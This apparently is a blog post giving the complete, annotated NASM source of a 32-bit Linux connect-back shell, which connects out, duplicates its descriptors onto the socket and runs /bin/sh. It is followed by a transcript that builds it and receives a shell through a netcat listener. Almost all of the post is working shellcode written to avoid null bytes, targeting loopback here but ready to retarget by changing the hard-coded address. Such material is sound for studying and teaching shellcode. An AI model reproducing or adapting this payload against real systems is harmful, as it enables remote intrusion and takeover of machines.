# cat blog >> /dev/brain 2> /proc/mind
cat blog >> /dev/brain 2> /proc/mind
SERVER# cat sc.asm
;-----------------------------------------------------------------------
; sc.asm -- Linux/x86 (32-bit) connect-back shell, NASM syntax.
; ABI:   Linux i386 int 0x80. Socket operations go through the
;        socketcall multiplexer (syscall 102 = 0x66): ebx = sub-call
;        number, ecx = pointer to the argument array built on the stack.
; Flow:  socket() -> bind() to source port 4321 -> connect() to
;        127.0.0.1:1234 -> dup2() the socket onto fds 2,1,0 ->
;        execve("/bin//sh", {"/bin//sh", NULL}, {NULL}).
; Note:  no syscall return value is checked anywhere; execve runs
;        regardless of whether socket/bind/connect succeeded.
; Note:  the port and address values are hard-coded for the loopback
;        demo shown in the transcript below the listing.
; Invariants: edx = 0 from the initial cdq and is not rewritten until
;        the execve block (int 0x80 clobbers only eax); esi, then ebx
;        after the xchg, hold the socket fd. The push byte / cdq /
;        xchg / word-overwrite forms are chosen so the encoding has
;        no 0x00 bytes.
; NOTE(review): "section .txt" is not the conventional .text name; a
;        modern toolchain may map an unknown section non-executable.
;        The transcript shows it ran on the author's system -- confirm
;        before assuming the section attributes.
;-----------------------------------------------------------------------
BITS 32
section .txt
global _start
_start:
        ; sockfd=socket(AF_INET,SOCK_STREAM,0)
        ; sockfd=socket(2,1,0)
        push    byte 0x66               ; socketcall number (102)
        pop     eax
        cdq                             ; xor edx,edx (eax is positive, so edx = 0)
        xor     ebx,ebx
        inc     ebx                     ; ebx=0x00000001 (socket)
        push    edx                     ; edx=0x00000000 -> protocol 0
        push    byte 0x01               ; SOCK_STREAM
        push    byte 0x02               ; AF_INET
        mov     ecx,esp                 ; ecx = &[2,1,0]
        int     0x80                    ; system call
        xchg    esi,eax                 ; esi = sockfd (return value not checked)

        ; bind(sockfd,(struct sockaddr *)&sin,sizeof(struct sockaddr_in))
        ; bind(sockfd,[2,4321,0],16)
        push    byte 0x66               ; socketcall number (102)
        pop     eax
        inc     ebx                     ; ebx=0x00000002 (bind)
        push    edx                     ; edx=0x00000000 (Any available source IP) -> sin_addr
        push    word 0xe110             ; source port = 4321 (network byte order)
        push    word bx                 ; 0x0002 -> sin_family = AF_INET
        mov     ecx,esp                 ; ecx = &sin (8 bytes written; the 16-byte
                                        ; length below covers stack data above it
                                        ; as sin_zero)
        push    byte 0x10               ; 16
        push    ecx
        push    esi
        mov     ecx,esp                 ; ecx = &[sockfd, &sin, 16]
        int     0x80                    ; system call

        ; connect(sockfd,(struct sockaddr *)&sin,sizeof(struct sockaddr_in))
        ; connect(sockfd,[2,1234,127.0.0.1],16)
        push    byte 0x66               ; socketcall number (102)
        pop     eax
        push    dword 0x01bbbb7f        ; 127.187.187.1
        xor     ecx,ecx
        mov     word [esp+1],cx         ; destination ip = 127.0.0.1 (0xbb bytes -> 0x00)
        push    word 0xd204             ; destination port = 1234 (network byte order)
        push    word bx                 ; 0x0002 -> sin_family = AF_INET
        mov     ecx,esp                 ; ecx = &sin
        push    byte 0x10               ; 16
        push    ecx
        push    esi
        mov     ecx,esp                 ; ecx = &[sockfd, &sin, 16]
        inc     ebx                     ; ebx=0x00000003 (connect)
        int     0x80                    ; system call
        xchg    ebx,esi                 ; ebx = sockfd (oldfd for dup2), esi = 3

        ; dup2(cfd,i) for i = 2, 1, 0: stdin/stdout/stderr onto the socket
        push    byte 0x2
        pop     ecx                     ; ecx = newfd, counts 2 -> 0
dup_loop:
        mov     byte al,0x3f            ; dup2 number (63); only al is written, so
                                        ; this relies on eax's upper bytes being 0
                                        ; (connect returned 0 / dup2 returned newfd)
        int     0x80                    ; system call
        dec     ecx
        jns     dup_loop                ; loop while ecx >= 0

        ; execve("/bin/sh",shell,NULL)
        xor     eax,eax
        mov     byte al,11              ; system call number
        push    edx                     ; \0 (edx is still 0 from cdq)
        push    long 0x68732f2f         ; hs//
        push    long 0x6e69622f         ; nib/  -> "/bin//sh\0" on the stack
        mov     ebx,esp                 ; first parameter: pathname
        push    edx
        mov     edx,esp                 ; third parameter: envp -> {NULL} (empty environment)
        push    ebx
        mov     ecx,esp                 ; second parameter: argv -> {pathname, NULL}
        int     0x80                    ; system call
SERVER# nasm -f elf sc.asm && ld -o sc sc.o
CLIENT# nc -lv 127.0.0.1 1234
SERVER# ./sc
Connection from [127.0.0.1] port 1234 [tcp/*] accepted (family 2, sport 4321)
hostname
SERVER
exit
CLIENT#
cat sc.asm
nasm -f elf sc.asm && ld -o sc sc.o
nc -lv 127.0.0.1 1234
./sc
hostname
exit